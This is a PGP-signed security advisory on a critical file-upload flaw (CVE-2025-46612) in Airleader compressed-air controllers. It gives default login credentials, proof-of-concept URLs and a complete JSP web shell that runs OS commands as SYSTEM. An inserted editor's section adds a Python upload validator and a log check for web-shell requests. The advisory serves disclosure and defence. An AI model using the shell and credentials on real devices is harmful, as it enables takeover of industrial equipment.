-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2025-036
Product: Airleader Master / Airleader Easy
Manufacturer: Airleader WF Steuerungstechnik GmbH
Affected Version(s): < 6.36
Tested Version(s): 6.33
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level: Critical
Solution Status: Fixed
Manufacturer Notification: 2025-04-22
Solution Date: -
Public Disclosure: 2025-05-12
CVE Reference: CVE-2025-46612
Author of Advisory: Angel Lomeli, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Airleader Master and Airleader Easy (see [1]) are large hardware modules
for controlling compressed air stations, mainly used in the manufacturing
industry. The units are focused on efficiency and economization of
resources, allowing for the measuring and control of compressed air
quality. They include embedded web interfaces for data visualization and
management.

The web interface is configured with weak credentials by default, as
reported in a previous security advisory (see [2]).

The application includes a "Panel Designer" dashboard (see [3]), which
allows for unrestricted file upload. This can be abused to upload a web
shell to the web server and achieve remote command execution in the
underlying OS.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The software is vulnerable to the following:

1. Using weak default credentials for the web interface:

   Airleader Master: airleader / airleader

2. Unrestricted file upload, which can be abused to upload a shell

3. The web server runs with the highest privileges by default

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To reproduce this, follow the steps below:

1. Open the Airleader administrator console:

   https:////admin/login.jsp?show=login

2. Log in with the default credentials (airleader:airleader)

3. Navigate to "Fernbedienung" -> "Panel Designer" dashboard or directly
   visit the URL

   https:////wizard/workspace.jsp?admin=true

4. Click on the "image upload" button and upload a JSP shell file, for
   example:

   <%@ page import="java.io.InputStream" %>
   <%@ page contentType="text/html;charset=UTF-8" language="java" %>
   <%
       if ("test".equals(request.getParameter("pwd"))) {
           InputStream in = Runtime.getRuntime()
               .exec(request.getParameter("cmd").split(" "))
               .getInputStream();
           int ret = -1;
           byte[] bs = new byte[2048];
           out.print("\n");
           while ((ret = in.read(bs)) != -1) {
               out.println(new String(bs));
           }
           out.print("\n");
       }
   %>

5. It is now possible to run OS commands via the uploaded JSP shell, such
   as by accessing the following URL:

   https:////wizard/images/panel/.jsp?pwd=test&cmd=whoami

   > nt authority\system

6. Notice that the commands are run with the highest privileges

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has released a security update to mitigate this issue in
version 6.36. SySS GmbH recommends updating the software to the latest
version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-04-03: Vulnerability discovered
2025-04-22: Vulnerability reported to manufacturer
2025-04-22: Vendor notified that this has been fixed in version 6.36
2025-05-12: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Airleader modules
    https://www.airleader.de/produkte
[2] SySS Security Advisory SYSS-2020-033
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-033.txt
[3] Panel Designer user guide
    https://www.airleader.de/user/upload/downloads/ib-und-montage/panel-designer.pdf
[4] SySS Security Advisory SYSS-2025-036
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-036.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by:

Angel Lomeli
E-Mail: angel.lomeli@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Angel_Lomeli.asc
Key ID: 0x3511BA21C68F0D7A
Key Fingerprint: A081 85AB C051 78ED CE8A F8E2 3511 BA21 C68F 0D7A

Fidelis Abt
E-Mail: fidelis.abt@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Fidelis_Abt.asc
Key ID: 0xD3BE05CA41B71781
Key Fingerprint: A5BA AD2D E1A3 EBEB F43B A99C D3BE 05CA 41B7 1781

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
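Editor's added example (not part of the SySS advisory and not the vendor's code): the root cause above is an "image upload" that accepts any file type and stores it under a servlet-mapped directory, so a defender wants two things: server-side validation that only real, allowlisted images with safe names are stored, and a log check that flags any executable page being requested from the image directory. The upload path /wizard/images/panel/ is taken from the advisory; the handler and the log lines are constructed for this example, and the file name sample.jsp in the log is a placeholder, not the name from the PoC.

```python
import re
from pathlib import PurePosixPath

# Constructed allowlist: extension -> magic bytes a real file of that type starts with.
# Anything not in this table (e.g. .jsp, .jspx, .war) is rejected regardless of MIME header.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Base name without dots: rejects double extensions such as shell.jsp.png.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_image_upload(filename: str, content: bytes):
    """Hypothetical server-side check for a panel image upload.

    Returns (accepted, reason). The checks are ordered so that the cheapest
    rejection (bad name) happens before the content is inspected.
    """
    # Strip any directory part; a filename that changes here carried a path.
    name = PurePosixPath(filename.replace("\\", "/")).name
    if name != filename or name in ("", ".", ".."):
        return False, "path component in filename"
    stem, dot, ext = name.rpartition(".")
    if not dot or "." + ext.lower() not in ALLOWED_TYPES:
        return False, "extension not allowlisted"
    if not SAFE_STEM.fullmatch(stem):
        return False, "unsafe filename"
    magic = ALLOWED_TYPES["." + ext.lower()]
    # Declared type must match the bytes; a JSP renamed to .png fails here.
    if not content.startswith(magic):
        return False, "content does not match declared image type"
    return True, "ok"


# Constructed access-log lines in common log format (not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2025:10:01:02 +0200] "GET /wizard/images/panel/logo.png HTTP/1.1" 200 5120
10.0.0.5 - - [12/May/2025:10:01:09 +0200] "GET /wizard/images/panel/sample.jsp?pwd=test&cmd=whoami HTTP/1.1" 200 43
10.0.0.7 - - [12/May/2025:10:02:11 +0200] "GET /wizard/workspace.jsp?admin=true HTTP/1.1" 200 9001
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) ')
UPLOAD_DIR = "/wizard/images/panel/"  # image directory named in the advisory


def find_executable_in_upload_dir(log_text: str):
    """Return (client_ip, path) for every request of a JSP page served from the
    upload directory. Legitimate panel images never have such a path, so any hit
    indicates a stored web shell being invoked."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("target").split("?", 1)[0]
        if path.startswith(UPLOAD_DIR) and path.lower().endswith((".jsp", ".jspx")):
            hits.append((m.group("ip"), path))
    return hits


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    for fname, data in [("logo.png", png), ("shell.jsp", b"<%@ page %>"),
                        ("shell.jsp.png", png), ("fake.png", b"<%@ page %>")]:
        print(fname, validate_image_upload(fname, data))
    print(find_executable_in_upload_dir(SAMPLE_LOG))
```

The validator deliberately does not trust the client-supplied Content-Type header or a blocklist of "dangerous" extensions; both are trivially bypassed. Storing accepted files outside any servlet-mapped path, and running the servlet container as an unprivileged account rather than SYSTEM (the third finding above), each remove a further link in the chain even if validation is bypassed.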
Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iHUEARYKAB0WIQSggYWrwFF47c6K+OI1Ebohxo8NegUCaBx7EQAKCRA1Ebohxo8N
eiMnAQDMGOXEZU2+BCXmYduACYTXyjced69QBFcsWgxN8ED+kwEAmaZCqgigJTpK
WibPJ9tjcdWB0Dgh4jVapQEX/5YkSwo=
=QcF/
-----END PGP SIGNATURE-----